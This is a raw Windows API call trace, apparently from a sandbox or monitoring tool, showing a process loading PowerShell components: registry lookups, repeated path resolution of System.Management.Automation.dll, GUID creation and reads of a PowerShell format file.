	[0479.450] RegQueryValueExW (in: hKey=0x30c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x24d04c, lpData=0x0, lpcbData=0x24d048*=0x0 | out: lpType=0x24d04c*=0x1, lpData=0x0, lpcbData=0x24d048*=0x56) returned 0x0
	[0479.450] CoTaskMemAlloc (cb=0x5a) returned 0x46ea70
	[0479.450] RegQueryValueExW (in: hKey=0x30c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x24d01c, lpData=0x46ea70, lpcbData=0x24d018*=0x56 | out: lpType=0x24d01c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x24d018*=0x56) returned 0x0
	[0479.450] CoTaskMemFree (pv=0x46ea70) 
	[0479.450] RegCloseKey (hKey=0x30c) returned 0x0
	[0479.450] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", nBufferLength=0x105, lpBuffer=0x24cd10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", lpFilePart=0x0) returned 0x3d
	[0479.450] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", nBufferLength=0x105, lpBuffer=0x24cbc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", lpFilePart=0x0) returned 0x3d
	[0479.461] CoCreateGuid (in: pguid=0x24d2f0 | out: pguid=0x24d2f0*(Data1=0x455368f4, Data2=0x7962, Data3=0x4dbf, Data4=([0]=0x8f, [1]=0xa2, [2]=0x4a, [3]=0x4b, [4]=0xa7, [5]=0x3a, [6]=0xe7, [7]=0xcf))) returned 0x0
	[0479.462] CoCreateGuid (in: pguid=0x24d2f0 | out: pguid=0x24d2f0*(Data1=0x3b4d61b9, Data2=0xfc29, Data3=0x4e9c, Data4=([0]=0xb5, [1]=0xc6, [2]=0x93, [3]=0xdf, [4]=0x88, [5]=0x54, [6]=0xcd, [7]=0x5))) returned 0x0
	[0479.462] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c790, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0479.462] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c6e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0479.462] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c6e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0479.462] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c6e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0480.646] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c790, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0480.646] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c6e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0480.646] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c6e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0480.647] CoCreateGuid (in: pguid=0x24d2f0 | out: pguid=0x24d2f0*(Data1=0x90c64965, Data2=0x6655, Data3=0x4acf, Data4=([0]=0x87, [1]=0x89, [2]=0x8c, [3]=0x60, [4]=0x7f, [5]=0x41, [6]=0x64, [7]=0x8e))) returned 0x0
	[0480.647] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c3d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0480.647] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c320, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0480.647] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c320, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0480.647] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c3d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0480.648] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c320, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0480.648] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c320, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0480.648] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c790, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0480.648] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c6e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0480.648] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c6e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0480.649] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24be80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0480.649] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24bdd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0480.649] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24bdd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0480.649] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c790, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0480.649] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c6e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0480.649] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c6e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0480.649] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c790, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0480.650] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c6e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0480.650] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c6e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0480.650] VirtualQuery (in: lpAddress=0x24b300, lpBuffer=0x24c1c0, dwLength=0x30 | out: lpBuffer=0x24c1c0*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0480.651] VirtualQuery (in: lpAddress=0x24b390, lpBuffer=0x24c250, dwLength=0x30 | out: lpBuffer=0x24c250*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0480.652] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c790, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0480.652] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c6e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0480.652] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c6e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0480.652] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c600, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0480.653] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c550, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0480.653] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c550, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0480.653] VirtualQuery (in: lpAddress=0x24bb10, lpBuffer=0x24c9d0, dwLength=0x30 | out: lpBuffer=0x24c9d0*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0480.654] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c600, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0480.654] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c550, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0480.654] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c550, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0481.622] VirtualQuery (in: lpAddress=0x24bb10, lpBuffer=0x24c9d0, dwLength=0x30 | out: lpBuffer=0x24c9d0*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0481.623] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c600, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0481.624] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c550, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0481.624] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c550, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0481.625] CoCreateGuid (in: pguid=0x24d2f0 | out: pguid=0x24d2f0*(Data1=0xf5620127, Data2=0x29d0, Data3=0x483a, Data4=([0]=0xa9, [1]=0xd8, [2]=0x6c, [3]=0xd9, [4]=0x77, [5]=0x99, [6]=0x99, [7]=0xa8))) returned 0x0
	[0481.626] CoCreateGuid (in: pguid=0x24d2f0 | out: pguid=0x24d2f0*(Data1=0xe31ff326, Data2=0xed9, Data3=0x42fe, Data4=([0]=0xba, [1]=0x58, [2]=0x13, [3]=0xd5, [4]=0x9f, [5]=0x6f, [6]=0x9b, [7]=0x8b))) returned 0x0
	[0481.626] CoCreateGuid (in: pguid=0x24d2f0 | out: pguid=0x24d2f0*(Data1=0xeb9b35fc, Data2=0x7d73, Data3=0x4d05, Data4=([0]=0x82, [1]=0x14, [2]=0xa, [3]=0x46, [4]=0x2c, [5]=0xfd, [6]=0x81, [7]=0xc1))) returned 0x0
	[0482.527] CoCreateGuid (in: pguid=0x24d2f0 | out: pguid=0x24d2f0*(Data1=0xfbaef794, Data2=0x3472, Data3=0x4c84, Data4=([0]=0x94, [1]=0x44, [2]=0x72, [3]=0x59, [4]=0x6f, [5]=0xa2, [6]=0x6d, [7]=0x9b))) returned 0x0
	[0482.528] CoCreateGuid (in: pguid=0x24d2f0 | out: pguid=0x24d2f0*(Data1=0x5609f1f2, Data2=0x84ea, Data3=0x413e, Data4=([0]=0xbf, [1]=0x61, [2]=0xce, [3]=0x8f, [4]=0x74, [5]=0xa6, [6]=0xa7, [7]=0x66))) returned 0x0
	[0482.529] CoCreateGuid (in: pguid=0x24d2f0 | out: pguid=0x24d2f0*(Data1=0xa2e52797, Data2=0xb395, Data3=0x4c09, Data4=([0]=0x9f, [1]=0x61, [2]=0x4b, [3]=0xe0, [4]=0x88, [5]=0x86, [6]=0xf1, [7]=0x59))) returned 0x0
	[0482.529] CoCreateGuid (in: pguid=0x24d2f0 | out: pguid=0x24d2f0*(Data1=0x69f6b299, Data2=0xf1e7, Data3=0x46ea, Data4=([0]=0x83, [1]=0x42, [2]=0x40, [3]=0x55, [4]=0x33, [5]=0x8c, [6]=0x3a, [7]=0xa8))) returned 0x0
	[0482.529] CoCreateGuid (in: pguid=0x24d2f0 | out: pguid=0x24d2f0*(Data1=0xed346f06, Data2=0x591a, Data3=0x431e, Data4=([0]=0x92, [1]=0xc, [2]=0x62, [3]=0x3f, [4]=0x46, [5]=0xa3, [6]=0x84, [7]=0x41))) returned 0x0
	[0482.529] CoCreateGuid (in: pguid=0x24d2f0 | out: pguid=0x24d2f0*(Data1=0x4edb3ac0, Data2=0xe415, Data3=0x48d2, Data4=([0]=0x8a, [1]=0x8b, [2]=0xe8, [3]=0x59, [4]=0x84, [5]=0x8c, [6]=0x2b, [7]=0x13))) returned 0x0
	[0482.530] CoCreateGuid (in: pguid=0x24d2f0 | out: pguid=0x24d2f0*(Data1=0x88a6e208, Data2=0xf928, Data3=0x4326, Data4=([0]=0x89, [1]=0x49, [2]=0x9f, [3]=0x3, [4]=0x58, [5]=0x87, [6]=0xbb, [7]=0x35))) returned 0x0
	[0482.530] CoCreateGuid (in: pguid=0x24d2f0 | out: pguid=0x24d2f0*(Data1=0x678d3e8e, Data2=0xb021, Data3=0x4410, Data4=([0]=0xbf, [1]=0x70, [2]=0x8a, [3]=0x13, [4]=0xf5, [5]=0x72, [6]=0x9d, [7]=0x8))) returned 0x0
	[0482.530] CoCreateGuid (in: pguid=0x24d2f0 | out: pguid=0x24d2f0*(Data1=0x8a181050, Data2=0xe10b, Data3=0x42b8, Data4=([0]=0xa1, [1]=0xf7, [2]=0x26, [3]=0x5f, [4]=0x4f, [5]=0x3e, [6]=0xd0, [7]=0x4d))) returned 0x0
	[0482.531] CoCreateGuid (in: pguid=0x24d2f0 | out: pguid=0x24d2f0*(Data1=0x744c3579, Data2=0x6123, Data3=0x4c50, Data4=([0]=0x9e, [1]=0x8c, [2]=0x2c, [3]=0xba, [4]=0x58, [5]=0xd3, [6]=0x50, [7]=0xe))) returned 0x0
	[0482.533] CoCreateGuid (in: pguid=0x24d2f0 | out: pguid=0x24d2f0*(Data1=0x1acb8121, Data2=0x50b4, Data3=0x4b8c, Data4=([0]=0xa7, [1]=0xe, [2]=0xe3, [3]=0x65, [4]=0x41, [5]=0xb5, [6]=0x96, [7]=0x81))) returned 0x0
	[0482.534] CoCreateGuid (in: pguid=0x24d2f0 | out: pguid=0x24d2f0*(Data1=0x622724cf, Data2=0x723f, Data3=0x4d6f, Data4=([0]=0x8c, [1]=0x25, [2]=0xf6, [3]=0x15, [4]=0x64, [5]=0xca, [6]=0xfa, [7]=0xd))) returned 0x0
	[0482.534] CoCreateGuid (in: pguid=0x24d2f0 | out: pguid=0x24d2f0*(Data1=0x2ce5deb8, Data2=0x3cc4, Data3=0x41cd, Data4=([0]=0xad, [1]=0x81, [2]=0xa9, [3]=0xab, [4]=0x31, [5]=0xdd, [6]=0x40, [7]=0x7d))) returned 0x0
	[0482.535] CoCreateGuid (in: pguid=0x24d2f0 | out: pguid=0x24d2f0*(Data1=0x2e88d790, Data2=0x454b, Data3=0x48ae, Data4=([0]=0x89, [1]=0x26, [2]=0xda, [3]=0x1d, [4]=0x18, [5]=0x40, [6]=0x84, [7]=0xbe))) returned 0x0
	[0482.535] CoCreateGuid (in: pguid=0x24d2f0 | out: pguid=0x24d2f0*(Data1=0x14bbec8, Data2=0x6173, Data3=0x45ed, Data4=([0]=0x9b, [1]=0x60, [2]=0x21, [3]=0x4, [4]=0x48, [5]=0xf5, [6]=0x34, [7]=0xc4))) returned 0x0
	[0482.535] CoCreateGuid (in: pguid=0x24d2f0 | out: pguid=0x24d2f0*(Data1=0x1267cfef, Data2=0x8072, Data3=0x4bec, Data4=([0]=0x8a, [1]=0xe0, [2]=0xc5, [3]=0x94, [4]=0xb7, [5]=0x36, [6]=0x21, [7]=0x72))) returned 0x0
	[0482.535] CoCreateGuid (in: pguid=0x24d2f0 | out: pguid=0x24d2f0*(Data1=0xde36da45, Data2=0x3540, Data3=0x4f7f, Data4=([0]=0xad, [1]=0x42, [2]=0x3b, [3]=0x66, [4]=0x65, [5]=0x7b, [6]=0xfd, [7]=0x35))) returned 0x0
	[0482.536] CoCreateGuid (in: pguid=0x24d2f0 | out: pguid=0x24d2f0*(Data1=0x8b4bcd2a, Data2=0xc363, Data3=0x4ceb, Data4=([0]=0xb0, [1]=0xc8, [2]=0x5d, [3]=0xd1, [4]=0xbc, [5]=0x9e, [6]=0xe0, [7]=0x42))) returned 0x0
	[0482.536] CoCreateGuid (in: pguid=0x24d2f0 | out: pguid=0x24d2f0*(Data1=0xfb2b97a2, Data2=0x7783, Data3=0x4248, Data4=([0]=0xb4, [1]=0x5f, [2]=0x86, [3]=0x17, [4]=0xed, [5]=0x60, [6]=0x94, [7]=0x69))) returned 0x0
	[0482.536] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershellcore.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x30c
	[0482.536] GetFileType (hFile=0x30c) returned 0x1
	[0482.536] SetErrorMode (uMode=0x1) returned 0x1
	[0482.536] GetFileType (hFile=0x30c) returned 0x1
	[0482.536] ReadFile (in: hFile=0x30c, lpBuffer=0x30e1e00, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d038, lpOverlapped=0x0 | out: lpBuffer=0x30e1e00*, lpNumberOfBytesRead=0x24d038*=0x1000, lpOverlapped=0x0) returned 1
	[0482.537] ReadFile (in: hFile=0x30c, lpBuffer=0x30e1e00, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d038, lpOverlapped=0x0 | out: lpBuffer=0x30e1e00*, lpNumberOfBytesRead=0x24d038*=0x1000, lpOverlapped=0x0) returned 1
	[0482.537] ReadFile (in: hFile=0x30c, lpBuffer=0x30e1e00, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d038, lpOverlapped=0x0 | out: lpBuffer=0x30e1e00*, lpNumberOfBytesRead=0x24d038*=0x1000, lpOverlapped=0x0) returned 1
	[0482.537] ReadFile (in: hFile=0x30c, lpBuffer=0x30e1e00, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d038, lpOverlapped=0x0 | out: lpBuffer=0x30e1e00*, lpNumberOfBytesRead=0x24d038*=0x1000, lpOverlapped=0x0) returned 1
	[0482.537] ReadFile (in: hFile=0x30c, lpBuffer=0x30e1e00, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d038, lpOverlapped=0x0 | out: lpBuffer=0x30e1e00*, lpNumberOfBytesRead=0x24d038*=0x1000, lpOverlapped=0x0) returned 1
	[0482.537] ReadFile (in: hFile=0x30c, lpBuffer=0x30e1e00, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d038, lpOverlapped=0x0 | out: lpBuffer=0x30e1e00*, lpNumberOfBytesRead=0x24d038*=0x1000, lpOverlapped=0x0) returned 1
	[0482.537] ReadFile (in: hFile=0x30c, lpBuffer=0x30e1e00, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d038, lpOverlapped=0x0 | out: lpBuffer=0x30e1e00*, lpNumberOfBytesRead=0x24d038*=0x1000, lpOverlapped=0x0) returned 1
